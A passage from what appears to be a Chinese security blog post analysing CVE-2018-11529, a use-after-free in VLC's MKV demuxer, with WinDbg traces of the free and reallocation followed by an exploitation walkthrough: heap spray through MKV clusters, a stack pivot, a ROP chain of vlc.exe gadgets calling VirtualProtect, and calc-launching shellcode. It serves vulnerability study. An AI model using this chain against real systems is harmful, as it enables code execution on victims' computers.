<p>在函数<code>Open()</code>起始地址处下断点，然后找到该函数参数<code>p_this</code>的位置，在其相应偏移处设置内存访问断点，观察这些位置内存的变化。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">0:011&gt; bp libmkv_plugin!vlc_entry_license__2_2_0b+0x10a0</span><br><span class="line">0:011&gt; g</span><br><span class="line">...</span><br><span class="line">Breakpoint 0 hit</span><br><span class="line">eax=6cd48ea0 ebx=029a9be8 ecx=035a393c edx=03b0fd2c esi=742d16f0 edi=74a66f20</span><br><span class="line">eip=6cd48ea0 esp=03b0fc64 ebp=03b0fcd8 iopl=0         nv up ei pl nz na pe nc</span><br><span class="line">cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206</span><br><span class="line">libmkv_plugin!vlc_entry_license__2_2_0b+0x10a0:</span><br><span class="line">6cd48ea0 55              push    ebp</span><br><span class="line">0:012&gt; dd esp</span><br><span class="line">03b0fc64  742d1740 035a393c 03b0fd2c 00000000</span><br><span class="line">03b0fc74  00000000 029a9be8 00000000 029a9be8</span><br></pre></td></tr></table></figure>
<p>根据上面整理的<code>Close()</code>中的的步骤，查看0x48处的<code>p_demux-&gt;p_sys</code></p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904132112.png" alt="p_sys，图中0x48的偏移可以在IDA中看到"></p>
<p>继续查看0x6c处的<code>p_vsegment</code></p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904132431.png" alt="p_vsegment"></p>
<p>当中断于此处时，<code>p_vsegment</code>的被赋值，我们根据各成员的偏移继续查看，直到找到<code>matroska_segment_c</code></p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Breakpoint 2 hit</span><br><span class="line">eax=035cfb50 ebx=00000000 ecx=06c8e748 edx=02a568e0 esi=035cfba4 edi=035cfba4</span><br><span class="line">eip=6cd2d128 esp=03b0fa28 ebp=03b0fb00 iopl=0         nv up ei pl zr na pe nc</span><br><span class="line">cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246</span><br><span class="line">libmkv_plugin+0x1d128:</span><br><span class="line">6cd2d128 0f8402070000    je      libmkv_plugin+0x1d830 (6cd2d830)        [br=1]</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904135249.png" alt></p>
<p>上图中标注<code>this</code>的位置就是为<code>matroska_segment_c</code>分配的内存，内存状态为busy</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; !heap -p -a 06c531d8</span><br><span class="line">    address 06c531d8 found in</span><br><span class="line">    _HEAP @ e70000</span><br><span class="line">      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state</span><br><span class="line">        06c531d0 0021 0000  [00]   06c531d8    00100 - (busy)</span><br><span class="line">          ? libmkv_plugin!vlc_entry_license__2_2_0b+12a970</span><br></pre></td></tr></table></figure>
<p>在IDA中查看该地址，定位在函数<code>demux_sys_t::PreloadLinked()</code>中，且只在函数<code>Open()</code>中被引用，所以很快就能在源码中找到分配该内存的位置：<br><figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">if</span> ( !p_sys-&gt;PreloadLinked() || </span><br><span class="line">     !p_sys-&gt;PreparePlayback( <span class="hljs-literal">NULL</span> ) )</span><br><span class="line">&#123;</span><br><span class="line">	msg_Err( p_demux, <span class="hljs-string">"cannot use the segment"</span> );</span><br><span class="line">	<span class="hljs-keyword">goto</span> error;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904140309.png" alt></p>
<p>所以到目前位置，现在最开始的5个问题都已经解决了。</p>
<h3 id="进一步证明分析"><a href="#进一步证明分析" class="headerlink" title="进一步证明分析"></a>进一步证明分析</h3><p>接下来我们还可以继续调试，来验证上面的分析是否正确</p>
<p>描述一个堆块的数据结构是<code>HEAP_ENTRY</code>，它位于一个堆块起始处前8字节，而一个堆块的状态由占用状态变为空闲状态时，对于已释放的堆块，堆管理器定义了<code>HEAP_FREE_ENTRY</code>结构来描述，相比<code>HEAP_ENTRY</code>，它多了8个字节的<code>LIST_ENTRY</code>结构用于存放空闲链表（Free List）的节点。</p>
<p>那么要定位到该堆块释放的位置就是十分容易了，我们只需要在<code>HEAP_ENTRY</code>处设置内存访问断点，当堆块释放时<code>HEAP_ENTRY</code>中某些标志位发生改变就能立刻断下。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904144212.png" alt="HEAP_ENTRY的标志位在低位上，所以断点下在+0x4的位置"></p>
<p>继续运行，不出所料的断在了<code>RtlpFreeHeapInternal</code>中，kb查看栈回溯，就可以找到libmkv_plugin.dll中释放这块内存位置。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">Breakpoint 3 hit</span><br><span class="line">eax=06ea5db8 ebx=00000000 ecx=00000000 edx=06ea5db8 esi=00900000 edi=06ea5db0</span><br><span class="line">eip=77246553 esp=03a8f9a8 ebp=03a8f9f4 iopl=0         nv up ei ng nz na po nc</span><br><span class="line">cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282</span><br><span class="line">ntdll!RtlpFreeHeapInternal+0xdb:</span><br><span class="line">77246553 7509            jne     ntdll!RtlpFreeHeapInternal+0xe6 (7724655e) [br=1]</span><br><span class="line">0:012&gt; kb</span><br><span class="line"> # ChildEBP RetAddr  Args to Child              </span><br><span class="line">00 03a8f9f4 771fdbf6 00000000 00000000 00000000 ntdll!RtlpFreeHeapInternal+0xdb</span><br><span class="line">01 03a8fa14 74a27409 00900000 00000000 06ea5db8 ntdll!RtlFreeHeap+0x46</span><br><span class="line">02 03a8fa60 6dd48e53 06ea5db8 ffffffff 03a8ff58 msvcrt!free+0x69</span><br><span class="line">WARNING: Stack unwind information not available. Following frames may be wrong.</span><br><span class="line">03 03a8fa80 6dd5b48f 008c68e0 008c6800 ffffffff libmkv_plugin+0x8e53</span><br><span class="line">04 03a8fac0 6dd5b788 03521e04 6de85fc0 6de86fdc libmkv_plugin+0x1b48f</span><br></pre></td></tr></table></figure>
<p>Step Over几次跳出到libmkv_plugin中，堆块状态已经由busy变为了free，同时libmkv_plugin+0x8e53的位置刚好和上面3.2中对上</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904145518.png" alt></p>
<p>再Step Over一次到libmkv_plugin+0x1b48f，由IDA中分析可知位于以下位置：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904145946.png" alt></p>
<p>继续追踪堆块的变化，当堆块状态变为busy时，就是重新分配的位置。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904150417.png" alt></p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; kb</span><br><span class="line"> # ChildEBP RetAddr  Args to Child              </span><br><span class="line">00 03a8fcd8 771fadce 00000000 00000000 00000100 ntdll!RtlpAllocateHeapInternal+0x311</span><br><span class="line">01 03a8fcf0 74a27610 00900000 00000000 00000100 ntdll!RtlAllocateHeap+0x3e</span><br><span class="line">02 03a8fd10 6dd76fde 00000100 035d2710 00000100 msvcrt!malloc+0x90</span><br><span class="line">WARNING: Stack unwind information not available. Following frames may be wrong.</span><br><span class="line">03 03a8fd20 742e62cc 0085dd88 03a8fd78 742e51c0 libmkv_plugin+0x36fde</span><br><span class="line">04 03a8fd80 7429154d 03521e04 0000000e 03a8fdb0 libvlccore!var_SetChecked+0x11c</span><br></pre></td></tr></table></figure>
<p>用同样的方法，可知重新分配发生在，也和上面的分析相契合。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904162931.png" alt></p>
<h3 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h3><p>libmkv_plugin.dll中的<code>Open()</code>函数调用<code>ProloadLinked()</code>时，创建了一个<code>virtual_segment_c</code>对象，在该对象的构造函数中，<code>matroska_segment_c</code>对象被初始化。而后面的<code>FreeUnused()</code>函数中又释放掉了<code>matroska_segment_c</code>对象，如下图所示。然后在函数<code>Control()</code>中，通过添加mkv文件attachment的方式，使得这块内存再次被分配，如上图所示。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904163629.png" alt></p>
<p>当然，这也不是最后触发漏洞的位置，下面的漏洞利用中将会具体介绍这个UAF如何被利用的。</p>
<p>而在<code>Close()</code>函数中，<code>p_vsegment</code>调用<code>CurrentSegment()</code>方法返回了一个指向<code>matroska_segment_c</code>的指针赋值给<code>p_segment</code>，但该指针指向的对象<code>matroska_segment_c</code>已经被释放，<code>p_segment</code>是一个悬空指针。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>漏洞作者给出的<a href="https://seclists.org/fulldisclosure/2018/Jul/28" target="_blank" rel="noopener">PoC</a> 利用流程如下：</p>
<ul>
<li>第一步：构造mkv文件基本结构</li>
<li>第二步：在mkv文件的Attachments结构中构造UAF对象</li>
<li>第三步：编写shellcode作为Heap Spray的Payload</li>
<li>第四步：通过调试确定Heap Spray的数量和每块的大小</li>
<li>第五步：将Payload作为mkv文件的Cluster结构</li>
<li>第六步：任意生成一个mkv文件（触发漏洞需要有另一个mkv文件在相同目录）</li>
<li>第七步：拼接各个结构</li>
<li>第八步：用VLC打开mkv，触发漏洞返回shell</li>
</ul>
<p>UAF漏洞利用的通用思路就是通过“占位”，将对象中的函数指针覆盖为ROP链的第一个gadget，通过第一个gadget进行Stack Pivot，将程序栈迁移的Heap Spray的内存中，进而通过ROP进行利用，思路可以概括如下：</p>
<ul>
<li>控制程序执行流程——利用UAF覆盖对象函数指针</li>
<li>稳定的寻址shellcode——绕过ASLR（Heap Spray）</li>
<li>让shellcode得以执行——绕过DEP（ROP和Stack Pivot）</li>
</ul>
<p>下面就按照上面的思路来具体分析。</p>
<h3 id="Heap-Spray部署shellcode"><a href="#Heap-Spray部署shellcode" class="headerlink" title="Heap Spray部署shellcode"></a>Heap Spray部署shellcode</h3><p>一个MKV文件所有的音视频帧数据都存放在Cluster这个结构中。每个Cluster内可能有很多个BlockGroup组成，BlockGroup内又由若干个Block组成。这些Block内就是音视频的帧数据。在PoC就是构造了数十个大小为0xfff000的Cluster，并将喷射数据放入每个Block中。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190904224615.png" alt></p>
<p>为了保证每次利用的稳定性，这里使用了很巧妙的方法。</p>
<p>我们可以观察到，当堆块进行大量分配的时候，堆地址的低位不会发生变化，仅有几个高字节是改变的，查看堆喷的内存块，可以看到每次打开PoC堆喷的地址总是以“018”结尾的，变化的总是前面的高位地址，所以我们只需以将每个Block的大小控制为0x1000，就能够准确得到喷射的位置。以下图为例，0x22000020所在堆块的UserPtr是0x211e5020。(0x211e5020 - 0x22000020)/0x1000 = 0xE1B(3611)刚好能被整除，也就是0x22000020的内容能被我们精确控制，因为它永远是一个Block的起始地址。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; !heap -flt s 0xfff000</span><br><span class="line">    _HEAP @ 7c0000</span><br><span class="line">    _HEAP @ 6f0000</span><br><span class="line">      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state</span><br><span class="line">        07248018 200000 0000  [00]   07248020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        08256018 200000 0000  [00]   08256020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        09269018 200000 0000  [00]   09269020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        0a27d018 200000 0000  [00]   0a27d020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        0b280018 200000 0000  [00]   0b280020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        0c292018 200000 0000  [00]   0c292020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        0d2a2018 200000 0000  [00]   0d2a2020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        0e2bb018 200000 0000  [00]   0e2bb020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        0f2c9018 200000 0000  [00]   0f2c9020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        102d0018 200000 0000  [00]   102d0020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        112e1018 200000 0000  [00]   112e1020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        122f3018 200000 0000  [00]   122f3020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        13303018 200000 0000  [00]   13303020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        14315018 200000 0000  [00]   14315020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        15320018 200000 0000  [00]   15320020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        1633c018 200000 0000  [00]   1633c020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        17342018 200000 0000  [00]   17342020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        1835e018 200000 0000  [00]   1835e020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        19369018 200000 0000  [00]   19369020    fff000 - (busy VirtualAlloc)</span><br><span class="line">        ...</span><br></pre></td></tr></table></figure>
<h3 id="构造UAF对象"><a href="#构造UAF对象" class="headerlink" title="构造UAF对象"></a>构造UAF对象</h3><p>MKV的Attachment部分主要是用于支持在文件中附加任何类型的文件，包括图片、网页、程序等。通过构造500个大小与之前被释放的matroska_segment_c大小相同的attachments，使释放掉的内存被重新分配。</p>
<p>结合源码可以看到，最后触发漏洞的函数并不是UAF对象的方法，而是从UAF对象中又取出的其他，所以在上面堆喷的数据中不仅布置了shellcode，还有<code>demux_sys_t、demux_t</code>和<code>es_out_t</code>这些结构。最终触发漏洞的<code>es_out_Del</code>函数的指针就定义在<code>es_out_t</code>这个结构中，回过头看看堆喷数据中，该指针已被布置为了ROP chains的起始地址。</p>
<h3 id="绕过-DEP-amp-ASLR"><a href="#绕过-DEP-amp-ASLR" class="headerlink" title="绕过 DEP&amp;ASLR"></a>绕过 DEP&amp;ASLR</h3><p>前面提到过，因为Mingw的漏洞，vlc.exe是没有地址随机化能力的。所以我们可以在vlc.exe模块中寻找可用的gadget，构造ROP chains。</p>
<p>不同于普通的栈溢出，此时我们能控制的只有几个寄存器的值，而当前程序的栈空间是不可控的，所以在ROP链的开始利用Stack Pivot，将栈指针esp指向堆喷的内存中，相当于将堆作为栈来使用。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">eax=2200031c ebx=00000000 ecx=220002e4 edx=22000310 esi=06e57358 edi=00f72298</span><br><span class="line">eip=6e3aaf80 esp=03a5fe18 ebp=034e8464 iopl=0         nv up ei pl nz na po nc</span><br><span class="line">cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202</span><br><span class="line">libmkv_plugin+0xaf80:</span><br><span class="line">*** WARNING: Unable to verify timestamp for C:\Users\zengy_lctlkhn\Desktop\vlc-2.2.8\vlc.exe</span><br><span class="line">*** ERROR: Module load completed but symbols could not be loaded for C:\Users\zengy_lctlkhn\Desktop\vlc-2.2.8\vlc.exe</span><br><span class="line">6e3aaf80 ff5208          call    dword ptr [edx+8]    ds:002b:22000318=0040ae91</span><br></pre></td></tr></table></figure>
<p>Stack Pivot</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vlc+0xae91:</span><br><span class="line">0040ae91 94              xchg    eax,esp</span><br><span class="line">0040ae92 004100          add     byte ptr [ecx],al</span><br><span class="line">0040ae95 8b00            mov     eax,dword ptr [eax]</span><br><span class="line">0040ae97 c3              ret</span><br></pre></td></tr></table></figure>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; dd esp</span><br><span class="line">2200031c  00407086 00000040 0040b058 41414141</span><br><span class="line">2200032c  41414141 41414141 004039c7 22000030</span><br><span class="line">2200033c  41414141 004039c8 0041193d 00409d18</span><br></pre></td></tr></table></figure>
<p>取出edi的值</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">vlc+0x7086:</span><br><span class="line">00407086 5f              pop     edi</span><br><span class="line">00407087 c3              ret</span><br></pre></td></tr></table></figure>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; dd esp</span><br><span class="line">22000320  00000040 0040b058 41414141 41414141</span><br><span class="line">22000330  41414141 004039c7 22000030 41414141</span><br><span class="line">22000340  004039c8 0041193d 00409d18 00000201</span><br></pre></td></tr></table></figure>
<p>将 edi 的值放入 edx,剩下的三条指令没有实际作用，在栈上填充无用的数据 来补偿被三个 pop 指令弹出的值</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">vlc+0xb058:</span><br><span class="line">0040b058 89fa            mov     edx,edi</span><br><span class="line">0040b05a 5e              pop     esi</span><br><span class="line">0040b05b 5f              pop     edi</span><br><span class="line">0040b05c 5d              pop     ebp</span><br><span class="line">0040b05d c3              ret</span><br></pre></td></tr></table></figure>
<p>剩下的几条 gadget 在为后面布置栈的内容做准备。<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vlc+0xb04d:</span><br><span class="line">0040b04d 5f              pop     edi</span><br><span class="line">0040b04e 5d              pop     ebp</span><br><span class="line">0040b04f c3              ret</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vlc+0x39c7:</span><br><span class="line">004039c7 58              pop     eax</span><br><span class="line">004039c8 59              pop     ecx</span><br><span class="line">004039c9 c3              ret</span><br></pre></td></tr></table></figure>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">vlc+0x39c8:</span><br><span class="line">004039c8 59              pop     ecx</span><br><span class="line">004039c9 c3              ret</span><br><span class="line"></span><br><span class="line">vlc+0x9d18:</span><br><span class="line">00409d18 5b              pop     ebx</span><br><span class="line">00409d19 c3              ret</span><br><span class="line"></span><br><span class="line">vlc+0xa623:</span><br><span class="line">0040a623 5d              pop     ebp</span><br><span class="line">0040a624 c3              ret</span><br><span class="line"></span><br><span class="line">vlc+0x36cb:</span><br><span class="line">004036cb 5e              pop     esi</span><br><span class="line">004036cc c3              ret</span><br><span class="line"></span><br><span class="line">vlc+0x36cb:</span><br><span class="line">004036cb 5e              pop     esi</span><br><span class="line">004036cc c3              ret</span><br></pre></td></tr></table></figure>
<p>将上面寄存器中的值压入栈中</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">vlc+0xaf61:</span><br><span class="line">0040af61 60              pushad</span><br></pre></td></tr></table></figure>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0:012&gt; dd esp</span><br><span class="line">2200034c  0040ae95 0040848c 0040a623 2200036c</span><br><span class="line">2200035c  00000201 00000040 0041193d 22000030</span><br><span class="line">2200036c  22000600 00000000 00000000 00000000</span><br></pre></td></tr></table></figure>
<p>设置 VirtualProtectStub 的参数</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">vlc+0xae95:</span><br><span class="line">0040ae95 8b00            mov     eax,dword ptr [eax]</span><br><span class="line">0040ae97 c3              ret</span><br></pre></td></tr></table></figure>
<p>转跳到 VirtualProtectStub 函数中，修改喷射内存的的执行权限</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">vlc+0x848c:</span><br><span class="line">0040848c ff248500e04000  jmp     dword ptr vlc+0xe000 (0040e000)[eax*4] ds:002b:00411308=&#123;KERNEL32!VirtualProtectStub (750a7c70)&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">vlc+0xa623:</span><br><span class="line">0040a623 5d              pop     ebp</span><br><span class="line">0040a624 c3              ret</span><br></pre></td></tr></table></figure>
<p>完成后转跳到 shellcode 继续执行</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">22000600 83e4fc          and     esp,0FFFFFFFCh</span><br><span class="line">22000603 31d2            xor     edx,edx</span><br><span class="line">22000605 52              push    edx</span><br><span class="line">22000606 6863616c63      push    636C6163h</span><br><span class="line">2200060b 54              push    esp</span><br><span class="line">2200060c 59              pop     ecx</span><br><span class="line">2200060d 52              push    edx</span><br><span class="line">2200060e 51              push    ecx</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>要实现漏洞的利用，只需简单的修改PoC中的shellcode部分就行，下面是经过修改的用于MSF的漏洞利用模块。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190902101834.png" alt></p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190902101833.png" alt></p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a href="https://www.filefix.org/format/mkv.html" target="_blank" rel="noopener">MKV File Format Specification</a></p>
<p><a href="https://www.matroska.org/technical/diagram/index.html" target="_blank" rel="noopener">matroska Diagram</a></p>
<p><a href="https://insights.sei.cmu.edu/cert/2018/08/when-aslr-is-not-really-aslr---the-case-of-incorrect-assumptions-and-bad-defaults.html" target="_blank" rel="noopener">When “ASLR” Is Not Really ASLR </a></p>

        </div>
        <!-- 文章结尾添加版权声明 从这里开始 -->
        
            <ul class="post-copyright">
                <li><strong>本文标题：</strong><a href="https://jontsang.github.io/post/8256c260.html">CVE-2018-11529——VLC Media Player UAF漏洞</a></li>
                <li><strong>本文作者：</strong><a href="https://jontsang.github.io">Jon Tsang</a></li>
                <!-- <li><strong>本文链接：</strong><a href="https://jontsang.github.io/post/8256c260.html">https://jontsang.github.io/post/8256c260.html</a></li> -->
                <li><strong>发布时间：</strong>2018-07-30</li>
                <li><strong>版权声明：</strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！</li>
                </ul>
        
        <!-- 文章结尾添加版权声明 到这里结束 -->
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/Binary/" rel="tag">Binary</a>, <a class="has-link-grey -link" href="/tags/CVE/" rel="tag">CVE</a>, <a class="has-link-grey -link" href="/tags/Heap-Spray/" rel="tag">Heap Spray</a>, <a class="has-link-grey -link" href="/tags/UAF/" rel="tag">UAF</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3>
        <div class="buttons is-centered">
            
                
<a class="button is-info donate">
    <span class="icon is-small">
        <i class="fab fa-alipay"></i>
    </span>
    <span>支付宝</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="支付宝"></div>
</a>

                
                
<a class="button is-success donate">
    <span class="icon is-small">
        <i class="fab fa-weixin"></i>
    </span>
    <span>微信</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="微信"></div>
</a>

                
        </div>
    </div>
</div>



<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/post/b32d2ce7.html">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">2018网鼎杯MISC——虚幻</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/post/d4ec6e34.html">
                <span class="level-item">CVE-2016-6909——Fortigate防火墙HTTPD栈溢出漏洞</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<div id="valine-thread" class="content"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#valine-thread' ,
        notify: true,
        verify: false,
        app_id: '2oTcdkk2ubE6P9DwKwwTTlDK-gzGzoHsz',
        app_key: 'z1TMyiu5W0zvLI3qKElhM6uU',
        placeholder: '不用注册也可以评论哟~支持Markdown~'
    });
</script>

    </div>
</div>
</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        
<div class="card widget">
    <div class="card-content">
        <nav class="level">
            <div class="level-item has-text-centered" style="flex-shrink: 1">
                <div>
                    
                    <figure class="image is-128x128 has-mb-6">
                        <img class="is-rounded" src="/images/avatar.png" alt="JonTsang">
                    </figure>
                    
                    <p class="is-size-4 is-block">
                        JonTsang
                    </p>
                    
                    
                    
                    <p class="is-size-6 is-flex is-flex-center has-text-grey">
                        <i class="fas fa-map-marker-alt has-mr-7"></i>
                        <span>Beijing, China</span>
                    </p>
                    
                </div>
            </div>
        </nav>
        <nav class="level is-mobile">
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        文章
                    </p>
                    <p class="title has-text-weight-normal">
                        25
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        分类
                    </p>
                    <p class="title has-text-weight-normal">
                        5
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        标签
                    </p>
                    <p class="title has-text-weight-normal">
                        30
                    </p>
                </div>
            </div>
        </nav>
        
        <div class="level">
